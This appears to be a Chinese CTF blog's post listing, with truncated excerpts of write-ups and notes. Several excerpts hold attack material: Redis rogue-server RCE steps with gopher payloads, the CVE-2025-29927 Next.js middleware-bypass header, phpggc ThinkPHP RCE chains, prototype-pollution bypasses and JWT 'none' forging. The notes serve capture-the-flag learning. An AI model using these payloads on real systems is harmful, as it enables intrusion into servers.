CISCN2025 x 第三届长城杯 初赛题解
也是进线下半决赛了汲汲爆 关注我们队的逆向手谢谢喵 Error 的小破站 题解 CISCN2025 汲汲爆战队题解 心里话 这次出题审核组杀的够狠,也看到了黑榜上的一些熟面孔。260个名单,反挂效率大于ace了属于。iscc快去学(恼),你是个啥国家赛事啊,丢嗨客的脸,打个iscc2025都恶心把题解发出来。 这么一杀,半决赛的师傅们应该会正义不少吧,水分少的情况下更要努力准备了。
redis主从复制学习笔记
下载攻击文件 Redis(<=5.0.5) RCE git clone https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server.git wget https://github.com/n0b0dyCN/redis-rogue-server/raw/refs/heads/master/exp.so 把exp.so复制到文件夹里 开启服务器 python3 redis_rogue_server.py -v -path exp.so -lport 1028 攻击 redis gopher 已知密码为123456 (可选)关闭redis只读(read only replica) gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520replica-read-only%2520no%250d%250aquit 设置dir gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520se ...
HeroCTF2025个人题解WP
WEB Tomwhat 题目部分源码 // LightServlet.javaprotected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String username = req.getParameter("username"); if ("darth_sidious".equalsIgnoreCase(username)) { req.setAttribute("error", "Forbidden username."); doGet(req, resp); return; } req.getSession().setAttribute("username&qu ...
NodeJS笔记自用
next_js 中间件绕过 cve-2025-29927 请求头加上 x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware 出现新的 Etag,替换一下给 If-None-Match,然后访问/dashboard 即可 小知识 connect.sid 类型的 Cookie,常见于使用 Express.js 搭配 express-session 中间件构建的 Node.js 应用 原型链污染 原型链污染, 过滤了 __proto__, 用 constructor.prototype 绕过 ejs 模板注入 https://www.anquanke.com/post/id/236354 { "username": "admin", "password": "123456", "constructor": { "prototyp ...
thinkphp漏洞总结
5.0文件写入漏洞 https://www.anquanke.com/post/id/196364 5.2RCE漏洞 ./phpggc -u ThinkPHP/RCE1 'system("cat /flag");' 6.0RCE漏洞 ./phpggc -u ThinkPHP/RCE2 'system("cat /flag");'
内存取证
因为2025年ciscn长城杯和ccsssc都考了很多内存取证题,都占到做题四分之三了。所以被迫开坑了。这是纯被逼的。。。 Lovelymem使用 使用建议加群获取,虽然开源了,但是群里还是分享了取证工具如vol和gimp,免得一个个找了。 接下来的题目都是在边刷边记录,加油。 PC’s name and IP address PC’s name vol2 python2 vol.py -f OtterCTF.vmem --profile=Win7SP1x64 printkey -K "ControlSet001\Control\ComputerName\ComputerName" Lovelymem 系统信息 WIN-LO6FAF3DTFE IP address vol2 python2 vol.py -f OtterCTF.vmem --profile=Win7SP1x64 netscan Lovelymem 网络信息 192.168.202.131 更新中。。
GHCTF2025个人题解WP
冲鸭汲汲爆!! Web upload?SSTI! 源码: import osimport refrom flask import Flask, request, jsonify,render_template_string,send_from_directory, abort,redirectfrom werkzeug.utils import secure_filenameimport osfrom werkzeug.utils import secure_filenameapp = Flask(__name__)# 配置信息UPLOAD_FOLDER = 'static/uploads' # 上传文件保存目录ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'}MAX_CONTENT_LENGTH = 16 * 1024 * ...
CISCN2024 x 长城杯 比赛题解
今年 Crypto 和 Web 都出了一题,比去年爆零有进步吧。 Crypto rasnd apbq+Crypto Lost_N 两道原题拼起来的 # Challenge1from tqdm import tqdmimport itertoolsimport gmpy2from Crypto.Util.number import *hints = [ 25574573929402935003283598068738618755197114816072485544111430127084604255064057898619020315793700619773020002231218663688600225987728493417652915285636730495107205389701731029171639528818049528850061176609364551478844661947985471969548086609584476215158971602178073047143790222773356597741788285217431876038197253930422 ...
常见jwt的工具使用和技巧
jwt 特性 jwt 原理就是 base64 编码,但 Base64 有三个字符+、/和=,在 URL 里面有特殊含义,所以要被替换掉:=被省略、+替换成-,/替换成_。 所以如果有废弃的 cookie 被直接匹配过滤,可以试试替换增加无用字符,绕过 waf。 自己加密 jwt none import jwtheader = { "alg": "none", "typ": "JWT"}content = { "iss": "admin", "iat": 1667822180, "exp": 1667829380, "nbf": 1667822180, "sub": "admin", "jti": "237410127e2551647730b97941cdcae5& ...
GeekChallenge2024 Web+Misc+Crypto个人题解WP
我是极客大挑战2024第二名队里的web手 关注我们队的逆向手谢谢喵 Error 的小破站 Web 100%的⚪ js代码搜atob能直接看到base64编码的flag ezpop 题目源码: <?phpClass SYC{ public $starven; public function __call($name, $arguments){ if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){ die('no hack'); } file_put_contents($this->starven,"<?php exit();".$this->starven); }}Class lover{ public $J1rry; ...
